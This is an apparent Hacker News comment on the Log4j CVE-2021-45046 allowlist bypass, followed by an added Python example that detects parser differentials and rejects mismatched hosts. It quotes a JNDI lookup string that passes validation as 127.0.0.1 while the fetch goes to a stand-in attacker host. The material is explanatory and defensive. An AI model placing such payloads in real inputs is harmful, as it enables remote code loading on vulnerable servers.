Hacker News

I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated a URL behaved differently than a separate parser used to fetch the URL, so a URL like

    jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.
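The parser differential described in the comment above, as an added example that is not part of the original post and is not Log4j's or the JDK's own code. The strict side uses Python's `urlsplit` (which, like an RFC 3986 parser, treats `#` as the start of the fragment); the lenient "fetch" side is a constructed stand-in that simply takes everything after `://` up to the first `:` or `/`. The defensive check, `safe_to_fetch`, refuses when the two parsers disagree on the host, when the host is not a well-formed DNS name or IPv4 literal, or when it is not on the allowlist; the function names, the `jndi:` stripping and the allowlist are assumptions for the illustration.

```python
import re
from urllib.parse import urlsplit

# Hostname grammar an allowlist check should insist on: dot-separated DNS labels
# (which also covers a dotted IPv4 literal). '#', '@', whitespace etc. must fail.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")

JNDI_PREFIX = "jndi:"


def _inner_url(lookup):
    """Strip the 'jndi:' prefix (assumed input shape) so 'ldap://...' can be parsed."""
    return lookup[len(JNDI_PREFIX):] if lookup.startswith(JNDI_PREFIX) else lookup


def validator_host(lookup):
    """Host as seen by a strict parser: '#' begins the fragment, so the
    authority ends there and everything after it is ignored."""
    try:
        return urlsplit(_inner_url(lookup)).hostname  # already lower-cased
    except ValueError:
        return None


def fetcher_host(lookup):
    """Constructed model of a lenient parser with no notion of a fragment:
    host = everything after '://' up to the first ':' or '/'."""
    _, sep, rest = _inner_url(lookup).partition("://")
    if not sep:
        return None
    end = next((i for i, ch in enumerate(rest) if ch in ":/"), len(rest))
    return rest[:end].lower()


def safe_to_fetch(lookup, allowed_hosts):
    """Allow the fetch only if both parsers agree on a well-formed host that is
    on the allowlist. Disagreement is itself treated as a rejection reason."""
    strict = validator_host(lookup)
    lenient = fetcher_host(lookup)
    if strict is None or lenient is None:
        return False
    if strict != lenient:          # parser differential: validated host != fetched host
        return False
    if not _HOST_RE.match(strict):  # rejects '#', '@', spaces and similar junk outright
        return False
    return strict in {h.lower() for h in allowed_hosts}


if __name__ == "__main__":
    allow = {"127.0.0.1"}
    # Constructed inputs: the lookup string from the comment and a benign one.
    for lookup in ("jndi:ldap://127.0.0.1#.evilhost.com:1389/a",
                   "jndi:ldap://127.0.0.1:1389/a"):
        print(lookup)
        print("  validator sees:", validator_host(lookup))
        print("  fetcher sees:  ", fetcher_host(lookup))
        print("  safe_to_fetch: ", safe_to_fetch(lookup, allow))
```

The point of the check is that the allowlist is applied to the host the fetch path will actually use, not to what a different parser happens to extract; when there is no way to share one parser between validation and fetching, comparing both results and rejecting on any mismatch closes the gap.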

